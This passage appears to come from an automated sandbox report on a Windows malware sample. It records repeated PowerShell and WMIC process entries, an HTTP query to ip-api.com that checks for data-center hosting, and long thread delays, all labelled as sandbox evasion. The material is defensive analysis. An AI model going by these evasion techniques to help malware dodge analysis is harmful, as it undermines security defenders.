                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        barindex
                        Check if machine is in data center or colocation facility
                        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeMemory allocated: 1EAAE7E0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeMemory allocated: 1EAC82F0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 597094Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 596969Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 596860Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 596735Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 596610Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 596485Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 596360Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 596235Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 596075Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 595853Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 595750Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 595641Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 595531Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 595422Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 595313Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 595188Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 595063Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 594938Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 594828Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 594716Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 594609Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 594499Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 594388Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 594281Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 594172Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 594063Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 593938Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 593813Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 593688Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 593563Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 593453Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 593342Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 593234Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 593125Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 593008Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 592900Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 592793Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 592688Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 592563Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 592438Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 592313Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 592187Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 592078Jump to behavior
